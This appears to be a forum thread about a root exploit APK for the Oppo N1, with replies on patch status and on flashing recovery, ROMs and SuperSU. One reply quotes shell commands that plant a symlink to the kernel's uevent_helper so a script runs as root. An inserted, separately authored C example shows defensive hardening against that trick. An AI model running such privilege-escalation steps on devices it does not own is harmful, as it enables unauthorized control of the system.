APK root exploit


jcase

Retired Forum Mod / Senior Recognized Developer
Feb 20, 2010
6,308
15,761
Raleigh NC
I tweeted this a couple of weeks ago before the N1 was publicly out, but here you go: nothing fancy, no real UI or output.

Thanks to Saurik and Giantpune for contributing (i.e., it's based on their research).

Install the APK, run it, wait 1 minute, install the SuperSU app from the market, then uninstall with this command:

adb uninstall com.qualcomm.privinit
 

Attachments

  • Oppown-build3.apk
    368.9 KB · Views: 37,349

Mr_Bartek

Guest
Do you have a link to their research or are their findings private?

Regards,
 

jcase

Retired Forum Mod / Senior Recognized Developer
Feb 20, 2010
6,308
15,761
Raleigh NC
Do you have a link to their research or are their findings private?

Regards,

saurik: his analysis of the "second master key vuln"

giantpune: his symlink attack vuln in property space:

Code:
/system/bin/mv /data/property /data/backupprop
/system/bin/mkdir /data/property
/system/bin/ln -s /sys/kernel/uevent_helper /data/property/.temp
/system/bin/setprop persist.sys.fail /data/pwn.sh
 
Reactions: al33m and Mr_Bartek
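The quoted layout only pays off because a privileged writer follows the planted symlink. Below is an added example (not code from this thread, and not Android's own property service) showing the two defensive pieces a root daemon wants against that layout: a property-file write that refuses symlinks (O_NOFOLLOW, plus fstat on the opened descriptor before anything is truncated or written) and a scan that reports symlink entries inside the property directory. The function names `safe_write_prop`, `count_symlinks` and `demo` are my own; the scratch tree is built under /tmp, and the `uevent_helper` file in it is a constructed stand-in for the sysfs node, so nothing outside the scratch directory is touched.

```c
/* Added example (not from the thread, not Android's own code): a property-file
 * write hardened against the /data/property symlink layout quoted above, plus a
 * scan for planted symlinks. Function names and scratch paths are my own. */
#define _GNU_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Write `value` to dir/name without following any link the attack relies on:
 * dir must be a real directory (lstat), the file is opened with O_NOFOLLOW so a
 * symlink named `name` fails with ELOOP, and fstat on the open descriptor must
 * show a regular file with a single hard link before anything is truncated or
 * written. Returns 0 on success, -1 on refusal or I/O error. */
int safe_write_prop(const char *dir, const char *name, const char *value)
{
    struct stat st;
    char path[PATH_MAX];

    if (lstat(dir, &st) != 0 || !S_ISDIR(st.st_mode))
        return -1;
    if (name[0] == '\0' || strchr(name, '/') != NULL)   /* one path component only */
        return -1;
    if (snprintf(path, sizeof path, "%s/%s", dir, name) >= (int)sizeof path)
        return -1;
    int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW | O_CLOEXEC, 0600);
    if (fd < 0)
        return -1;                      /* ELOOP: `name` is the planted symlink */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1 ||
        ftruncate(fd, 0) != 0) {
        close(fd);
        return -1;
    }
    ssize_t n = write(fd, value, strlen(value));
    close(fd);
    return (n >= 0 && (size_t)n == strlen(value)) ? 0 : -1;
}

/* Detection side: count symlink entries directly inside dir (a legitimate
 * property directory holds only regular files). Returns -1 if dir is unreadable. */
int count_symlinks(const char *dir)
{
    DIR *d = opendir(dir);
    if (d == NULL)
        return -1;
    int count = 0;
    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        char path[PATH_MAX];
        struct stat st;
        if (strcmp(e->d_name, ".") == 0 || strcmp(e->d_name, "..") == 0)
            continue;
        if (snprintf(path, sizeof path, "%s/%s", dir, e->d_name) < (int)sizeof path &&
            lstat(path, &st) == 0 && S_ISLNK(st.st_mode))
            count++;
    }
    closedir(d);
    return count;
}

/* Rebuild the quoted layout under a scratch directory (constructed for the demo;
 * the `uevent_helper` file stands in for the sysfs node). Returns 1 if the
 * hardened write refuses ".temp", accepts a plain property file, the scan finds
 * exactly one symlink and the stand-in target stays empty; 0 otherwise. */
int demo(void)
{
    char root[] = "/tmp/propdemo-XXXXXX";
    char prop[PATH_MAX], target[PATH_MAX], lnk[PATH_MAX], good[PATH_MAX];
    struct stat st;
    int fd, ok = 0;

    if (mkdtemp(root) == NULL)
        return 0;
    snprintf(prop, sizeof prop, "%s/property", root);
    snprintf(target, sizeof target, "%s/uevent_helper", root);
    snprintf(lnk, sizeof lnk, "%s/.temp", prop);
    snprintf(good, sizeof good, "%s/persist.sys.fail", prop);
    if (mkdir(prop, 0700) == 0 && (fd = open(target, O_WRONLY | O_CREAT, 0600)) >= 0) {
        close(fd);
        if (symlink(target, lnk) == 0) {
            int refused   = safe_write_prop(prop, ".temp", "/data/pwn.sh") == -1;
            int accepted  = safe_write_prop(prop, "persist.sys.fail", "/data/pwn.sh") == 0;
            int found     = count_symlinks(prop);
            int untouched = stat(target, &st) == 0 && st.st_size == 0;
            ok = refused && accepted && found == 1 && untouched;
        }
    }
    unlink(lnk); unlink(good); rmdir(prop); unlink(target); rmdir(root); /* cleanup */
    return ok;
}
```

The order inside `safe_write_prop` is the point: O_NOFOLLOW stops the open on a symlink, and the fstat check runs before `ftruncate`, so a hard link into another directory is refused without first emptying its target. `count_symlinks` is the cheap integrity check to run at boot over a directory that a root writer trusts.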

coolrevi

Senior Member
Jun 1, 2012
637
147
Udupi
I tweeted this a couple of weeks ago before the N1 was publicly out, but here you go: nothing fancy, no real UI or output.

Thanks to Saurik and Giantpune for contributing (i.e., it's based on their research).

Install the APK, run it, wait 1 minute, install the SuperSU app from the market, then uninstall with this command:

adb uninstall com.qualcomm.privinit

Will this exploit work on any other device? When I try to install, the Play Store warns about the vulnerability. Will this vulnerability be gone after uninstalling Oppown?
 

jcase

Retired Forum Mod / Senior Recognized Developer
Feb 20, 2010
6,308
15,761
Raleigh NC
Will this exploit work on any other device? When I try to install, the Play Store warns about the vulnerability. Will this vulnerability be gone after uninstalling Oppown?

Possibly other Oppo devices.

No, it doesn't fix the vuln, just be careful where you install apps from.
 

pulser_g2

Admin Emeritus / Senior Recognized Developer
Nov 27, 2009
19,544
11,630
A second master key vulnerability? Hmm, so this might not be patched in 4.4?
Great job by the way, I don't have the device but this is interesting!

It should be patched in 4.4.

But some (read most) OEMs still can't manage to patch their devices up to the latest security updates on release.

Anyway, I tested this root method a week or so ago and it works nicely :)
 

Ricky Divjakovski

Recognized Developer / Inactive RC
Feb 4, 2013
5,286
7,685
28
Sydney
It should be patched in 4.4.

But some (read most) OEMs still can't manage to patch their devices up to the latest security updates on release.

Anyway, I tested this root method a week or so ago and it works nicely :)

So you're saying in most devices the master key patch could be a possible vulnerability still in 4.3?

interesting...
 

jcase

Retired Forum Mod / Senior Recognized Developer
Feb 20, 2010
6,308
15,761
Raleigh NC
So you're saying in most devices the master key patch could be a possible vulnerability still in 4.3?

interesting...

It depends on whether OEMs backported it, on which build the OEMs used, and on the bug. There are four or five different zip parser bugs with similar results. The one I used was patched in 4.3, but others exist.
 
Reactions: Ricky Divjakovski

trickraca

New member
Dec 4, 2006
2
0
I'm trying to figure out why the Oppown APK will not install on my N1. Every time I try it just says "app not installed", but on the install screen it says something about being an update to an already installed program. Any clues as to what the issue is? All I've done is update to the latest OTA software, and I'm currently located in Indonesia if that makes a difference.
 

jcase

Retired Forum Mod / Senior Recognized Developer
Feb 20, 2010
6,308
15,761
Raleigh NC
I'm trying to figure out why the Oppown APK will not install on my N1. Every time I try it just says "app not installed", but on the install screen it says something about being an update to an already installed program. Any clues as to what the issue is? All I've done is update to the latest OTA software, and I'm currently located in Indonesia if that makes a difference.

Possibly they patched it by now; if you are on CyanogenMod you are certainly patched.

Sent from my HTC Two
 
Reactions: Lastdon2cu

Harfainx

Retired Forum Moderator
Apr 10, 2010
1,658
1,803
So how do you root the CyanogenMod edition N1? Can you help please? Does it come rooted or what?

You don't need to root if you aren't staying on stock. There's no lock anywhere on the bootloader or anything.

Simply flash TWRP in fastboot, then flash Omni (or whatever else) through TWRP.

You should be able to just flash a SuperSU zip in TWRP as well if you want to root the stock ColorOS.

Sent from my N1 using Tapatalk
 
Reactions: jcase

giuliano rigon

Senior Member
Oct 17, 2011
64
5
noobish doubts..

You don't need to root if you aren't staying on stock. There's no lock anywhere on the bootloader or anything.

Simply flash TWRP in fastboot, then flash Omni (or whatever else) through TWRP.

You should be able to just flash a SuperSU zip in TWRP as well if you want to root the stock ColorOS.

Sent from my N1 using Tapatalk
Please, I need a walkthrough.
1) download TWRP
2) put it in root of the telephone robot
3) flash it in recovery?
4) reboot to recovery, wipe cache and Dalvik, flash OmniRom.
Please correct me.
Thank you
 

Harfainx

Retired Forum Moderator
Apr 10, 2010
1,658
1,803
1) download TWRP: Yes
2) put it in root of the telephone: Yes
Make sure to copy OmniRom to your phone at some point
3) flash it in recovery? No. Flash TWRP in fastboot if you haven't flashed the recovery already. Use the official TeamWin site for guidance
4) reboot to recovery, wipe cache and Dalvik, flash OmniRom: Wipe Cache, Dalvik, System, and Data

Updates in Red

This is off-topic for this thread though. Questions/Info for flashing Omnirom should be addressed in the Omnirom thread.
 

nowy57

Senior Member
Nov 3, 2007
1,055
674
Poland
You don't need to root if you aren't staying on stock. There's no lock anywhere on the bootloader or anything.

Simply flash TWRP in fastboot, then flash Omni (or whatever else) through TWRP.

You should be able to just flash a SuperSU zip in TWRP as well if you want to root the stock ColorOS.

Sent from my N1 using Tapatalk


May you provide the right SuperSU.zip files?

I've got SuperSU from this link and it doesn't work on the first and second CM version :(
I am not rooted yet ...
Thanks
 

giuliano rigon

Senior Member
Oct 17, 2011
64
5
not rooted.. confirm i can flash

May you provide the right SuperSU.zip files?

I've got SuperSU from this link and it doesn't work on the first and second CM version :(
I am not rooted yet ...
Thanks
I have tried my damnedest to root: fastboot flashing SuperSU, flashing from recovery, direct install from Google Play, complete unroots and reflash letting recovery do it. No way.
So now I need a last confirmation: can I flash OmniRom after wipes even if I am unrooted? And has anyone rooted OmniRom, or does it come unrooted? Thanks for the info. Another idea: flashing ColorOS, rooting, and then flashing Omni. Or is this a late night bad dream?

---------- Post added at 01:17 AM ---------- Previous post was at 01:05 AM ----------

That does work. You're likely not removing root, but rather just uninstalling SuperSU.

I answered you in your Q&A thread on root.

Sorry, now I got it. It was in the forums. Just unchecking the "respect cyanogen settings" option in the SuperSU menu got me rooted and happy. Sorry for your time. I flashed the SuperSU zip from recovery, rebooted and unchecked it. Now I am set.
 

So how do you root the CyanogenMod edition N1? Can you help please? Does it come rooted or what?

It should not come rooted; if it comes rooted then no way did it pass CTS. I'm guessing unlocking the bootloader and flashing a recovery? I don't know, I don't have one.